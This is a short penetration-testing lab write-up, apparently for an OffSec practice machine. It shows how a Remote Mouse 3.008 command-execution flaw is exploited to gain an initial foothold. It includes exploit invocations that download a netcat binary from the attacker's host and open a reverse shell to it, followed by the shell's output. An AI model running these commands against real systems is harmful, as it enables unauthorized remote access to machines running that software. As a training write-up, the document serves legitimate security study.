Remote Mouse RCE
The target remotemouse instance appears to be vulnerable the arbitrary command execution as it matches the description. The version information has not been confirmed yet.
Exploit
The author included the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ git clone https://github.com/p0dalirius/RemoteMouse-3.008-Exploit
Cloning the exploit repo
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'powershell -ep bypass -nop -c iwr -Uri http://192.168.45.155/nc64.exe -OutFile C:\\Windows\\Temp\\nc64.exe'
Delivering the Netcat binary
hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ python3 RemoteMouse-3.008-Exploit/RemoteMouse-3.008-Exploit.py --target-ip $IP --cmd 'C:\\Windows\\Temp\\nc64.exe 192.168.45.155 443 -e cmd'
Invoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ nnc 443
listening on [any] 443 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.199] 52564
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\Users\divine> powershell -ep bypass -nop
powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\divine> whoami
whoami
remote-pc\divine
PS C:\Users\divine> hostname
hostname
Remote-PC
PS C:\Users\divine> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.239.199
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.239.254
Initial Foothold established to the target system as the divine
user via exploiting